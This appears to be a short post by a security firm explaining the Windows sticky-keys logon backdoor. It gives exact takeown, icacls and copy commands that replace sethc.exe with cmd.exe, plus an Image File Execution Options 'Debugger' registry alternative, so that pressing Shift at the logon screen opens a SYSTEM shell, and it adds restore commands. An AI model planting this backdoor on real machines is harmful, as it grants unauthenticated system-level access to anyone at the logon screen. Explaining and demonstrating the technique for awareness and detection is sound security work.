How many times have you seen a movie where the “hacker” connects to a system with a logon screen, hits a couple of keys, and gets a command shell. Here’s how this can be done for real in Windows.
The issue is that the Windows Ease of Use tools are accessible at the logon screen. Replacing the valid command(s) with a copy of cmd.exe provides a hidden command shell when pressing the right key combo (for example, pressing shift over and over again for “sticky keys”).
Here’s how to “hack the Windows logon screen” using an existing logged in privileged account.
Open a command prompt in Windows as an administrator and run the following commands:
icacls c:\windows\system32\sethc.exe /save c:\windows\system32\sethc.ACLFile /T
takeown /f sethc.exe
icacls sethc.exe /grant administrators:f
icacls c:\windows\system32\cmd.exe /save c:\windows\system32\cmd.ACLFile /T
takeown /f cmd.exe
icacls cmd.exe /grant administrators:f
copy c:\windows\system32\sethc.exe c:\windows\system32\sethcexe.BAK
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
Note that this can also be set via a registry enttry:
Open Regedit and browse to: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Create a new key called “sethc.exe”
Under this new key, create a new string value (REG_SZ) and call it “Debugger”
Modify this value to be “C:\windows\system32\cmd.exe”
Note that the winlogon process will kill the cmd window invoked through this method after a short amount of time.
You can now open the command prompt by pressing the Shift key about 5 to 10 times at the logon screen to open command prompt as SYSTEM.
To restore the files and permissions, open a command window as administrator and run the following:
copy c:\windows\system32\sethcexe.BAK c:\windows\system32\sethc.exe
icacls c:\windows\system32\sethc.exe /restore c:\windows\system32\sethc.ACLFile /T
icacls c:\windows\system32\cmd.exe /restore c:\windows\system32\cmd.ACLFile /T
Trimarc helps companies and organizations improve their security to better protect against and detect attacks.
Visit TrimarcSecurity.com for more information.